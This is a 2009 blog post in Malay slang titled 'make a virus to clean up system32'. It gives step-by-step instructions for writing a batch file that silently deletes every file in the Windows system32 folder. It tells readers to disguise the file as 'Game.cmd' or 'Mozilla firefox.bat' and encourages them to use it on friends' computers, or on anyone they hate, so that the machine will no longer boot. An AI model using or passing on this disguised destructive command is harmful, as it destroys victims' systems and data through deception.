Saturday, May 9, 2009

make a virus to clean up system32

hai guys..arini aku nk explain pasal teknik untuk menjahanam kan pc member korang or jugak pc member korang yang mana berguna untuk merosakkan pc die..heh heh..
cara die simple je..korang juz ikut step kat bawah ni..

1- korang open note pad korang
2- write the above command :-
del c:\windows\system32\*.* /q

3. Save the above notepad with the extension ".bat or .cmd" yang mana yang korang nak
contoh nye Game.cmd or Mozilla firefox.bat
4. !!!!!!!!!!!!!!!!!!!!!!Attention!!!!!!!!!!!!!!!!!!! !!!
Jangan double click file tu kecuali korang dalam MASALAH!!.
Kenapa ?????? bcz file yang korang create tu akan mendelete semua file dari korang punya folder system32 dan bila korang restart pc..pc korang x kn berfungsi..senang cite x kn keluar windows..sebb system tidak menjumpa files didalam folder system32 yang mana diperlukan semasa pc booting..
5- korang juga boleh test cara diatas dengan membuat satu folder fake.
let suppose windows1 in c:\. copy beberapa file lama kedalam nya dan ikut arahan step diatas tadi.
dengan double click pada .bat atau .cmd file , file korang akan automatically get deleted
6- korang boleh cuba trick ni di mana-mana computer atau sesiapa punya komputer.(tetapi hasil nya akan
mendatang kan bahaya kepada pc tersebut..jadi fikir dahulu sebelum buat kat pc orang lain)
7- tapi!!kalau korang da benci kat orang tu..korang buat je..x yah pikir ape yang aku cakap kat no6 tadi..
hua hua hua..jahat nye aku..

selamat mencuba =)

korang nye pc rosak aku x tanggung..



try la click sekali je..n just survey..click kat sini

Komentar :

ada 0 comments ke “make a virus to clean up system32”

Archive

x

© 1989-2010 . Powered by R.O.T.S.

kerabatchieko by CHIeKO IeM0cHI